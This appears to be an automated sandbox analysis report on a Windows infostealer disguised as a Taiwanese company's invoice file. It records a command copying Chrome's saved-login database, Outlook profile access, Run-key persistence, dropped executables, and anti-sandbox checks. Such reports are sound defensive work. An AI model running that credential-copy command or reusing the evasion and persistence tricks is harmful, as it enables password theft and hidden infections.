Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB141C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

0_2_00007FF6EB141C0C

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB146CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00007FF6EB146CA4

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1764:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: C:\Windows\SysWOW64\control.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp, 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000000.289878233.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: wextract.pdbGCTL source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp, 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000000.289878233.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: RegSvcs.pdb, source: control.exe, 0000000B.00000002.821881250.0000000005377000.00000004.10000000.00040000.00000000.sdmp, d6wtv4o01bbhxt.exe, 0000001F.00000000.769697263.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000022.00000000.779698903.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000026.00000000.798301524.0000000000722000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.384460936.0000000000B3F000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.385472124.0000000002A20000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.384460936.0000000000B3F000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.385472124.0000000002A20000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: control.exe, 0000000B.00000002.821881250.0000000005377000.00000004.10000000.00040000.00000000.sdmp, d6wtv4o01bbhxt.exe, d6wtv4o01bbhxt.exe, 0000001F.00000000.769697263.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000022.00000000.779698903.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, d6wtv4o01bbhxt.exe, 00000026.00000000.798301524.0000000000722000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\ZIoqdPXfyq\src\obj\Debug\SZArrayHelp.pdb source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000003.290884636.00000268D6D00000.00000004.00000020.00020000.00000000.sdmp, 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe, 00000000.00000003.291017386.00000268D4EDA000.00000004.00000020.00020000.00000000.sdmp, image.exe, image.exe, 00000002.00000002.304872357.0000000000952000.00000002.00000001.01000000.00000004.sdmp

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_00957594 push cs; ret	2_2_009577D4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_00957917 push es; retf	2_2_00957918
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_009577D8 push es; retf	2_2_009577DA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_052AE59C push esp; iretd	2_2_052AE5B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041505C push ds; retf	5_2_0041506C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B822 push eax; ret	5_2_0041B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B82B push eax; ret	5_2_0041B892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B88C push eax; ret	5_2_0041B892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00416131 push ss; iretd	5_2_00416133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00415271 push eax; ret	5_2_00415279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00414D67 push edi; ret	5_2_00414D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004155D6 push edx; iretd	5_2_004155D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B7D5 push eax; ret	5_2_0041B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A9D0D1 push ecx; ret	5_2_00A9D0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EBD0D1 push ecx; ret	11_2_04EBD0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5B88C push eax; ret	11_2_00E5B892
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5505C push ds; retf	11_2_00E5506C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5B822 push eax; ret	11_2_00E5B828
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5B82B push eax; ret	11_2_00E5B892
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E56131 push ss; iretd	11_2_00E56133
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E55271 push eax; ret	11_2_00E55279
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E555D6 push edx; iretd	11_2_00E555D7
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E54D67 push edi; ret	11_2_00E54D68
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5C542 push ss; ret	11_2_00E5C544
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5B7D5 push eax; ret	11_2_00E5B828

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB1430EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,

0_2_00007FF6EB1430EC

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]

Source: image.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xca5a8
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: real checksum: 0xc933a should be: 0xd8b16

Source: initial sample

Static PE information: section name: .text entropy: 7.58599561404

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\Qplltzvap\d6wtv4o01bbhxt.exe			Jump to dropped file

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB141684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

0_2_00007FF6EB141684

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\control.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MRLH6T			Jump to behavior
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0			Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MRLH6T	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MRLH6T	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 2.2.image.exe.2d15fd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: image.exe PID: 7008, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: image.exe, 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: image.exe, 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000E48604 second address: 0000000000E4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000E4899E second address: 0000000000E489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe TID: 7032	Thread sleep time: -36114s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe TID: 3144	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1716	Thread sleep time: -85000s >= -30000s	Jump to behavior
